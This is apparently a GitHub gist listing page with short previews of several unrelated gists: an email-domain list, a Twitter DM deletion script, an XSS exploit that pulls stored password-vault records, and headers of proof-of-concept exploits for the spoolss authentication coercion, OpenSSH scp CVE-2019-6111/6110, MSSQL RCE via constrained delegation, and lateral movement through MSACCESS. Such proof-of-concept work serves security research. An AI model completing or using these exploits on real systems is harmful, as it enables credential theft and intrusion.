Standard escape codes are prefixed with Escape:
- Ctrl-Key:
^[ - Octal:
\033 - Unicode:
\u001b - Hexadecimal:
\x1B - Decimal:
27
ammarshah
/ all_email_provider_domains.txt
Last active
April 21, 2025 07:13
A list of all email provider domains (free, paid, blacklist etc). Some of these are probably not around anymore. I've combined a dozen lists from around the web. Current "major providers" should all be in here as of the date this is created.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0-mail.com | |
| 007addict.com | |
| 020.co.uk | |
| 027168.com | |
| 0815.ru | |
| 0815.su | |
| 0clickemail.com | |
| 0sg.net | |
| 0wnd.net | |
| 0wnd.org |
taviso
/ delete-twitter-dm.js
Created
November 3, 2017 16:33
Automate deleting twitter direct messages.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Open direct messages window, paste this into console. | |
| function deleteNextConversation() | |
| { | |
| if (!(dm = document.getElementsByClassName("DMInbox-conversationItem")[0])) { | |
| clearInterval(tmr) | |
| return; | |
| } | |
| dm.firstChild.click(); | |
| setTimeout('document.getElementsByClassName("js-actionDeleteConversation")[0].click()', 1000); |
shawarkhanethicalhacker
/ password_vault_exploit.js
Created
August 20, 2018 07:26
XSS Exploit code for retrieving passwords stored in a Password Vault
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Exploit Code by Shawar Khan | |
| var data_chunks = ''; | |
| // Capturing Records from API | |
| fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) { | |
| // Holds the records in as String | |
| var allrecords = data; | |
| // converting response to JSON |
3xocyte
/ dementor.py
Last active
February 25, 2025 00:20
rough PoC to connect to spoolss to elicit machine account authentication
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
| # some code from https://www.exploit-db.com/exploits/2879/ | |
| import os | |
| import sys | |
| import argparse | |
| import binascii | |
| import ConfigParser |
| IDA Plugins | Preferred | Neutral | Unreviewed |
|---|
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| Title: SSHtranger Things | |
| Author: Mark E. Haase <[email protected]> | |
| Homepage: https://www.hyperiongray.com | |
| Date: 2019-01-17 | |
| CVE: CVE-2019-6111, CVE-2019-6110 | |
| Advisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt | |
| Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1 | |
| We have nicknamed this "SSHtranger Things" because the bug is so old it could be |
3xocyte
/ bad_sequel.py
Last active
January 11, 2024 01:42
PoC MSSQL RCE exploit using Resource-Based Constrained Delegation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html | |
| # this is a rough PoC | |
| # requirements for RCE: | |
| # - the attacker needs to either have or create an object with a service principal name | |
| # - the MSSQL server has to be running under the context of System/Network Service/a virtual account | |
| # - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts) | |
| # - NTLM has to be in use |
Use Manage Search Engines in your browser to add these search engines. You can then use the 'keyword' in the URL bar to do a quick lookup. Find more details about managing your search engines in Chrome here.
e.g. Type
v dad8ebcbb5fa6721ccad45b81874e22c
Philts
/ Invoke-AccessXSLT.ps1
Last active
February 14, 2021 15:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Lateral Movement Via MSACCESS TransformXML | |
| Author: Philip Tsukerman (@PhilipTsukerman) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None | |
| #> | |
| function Invoke-AccessXSLT { | |
| <# |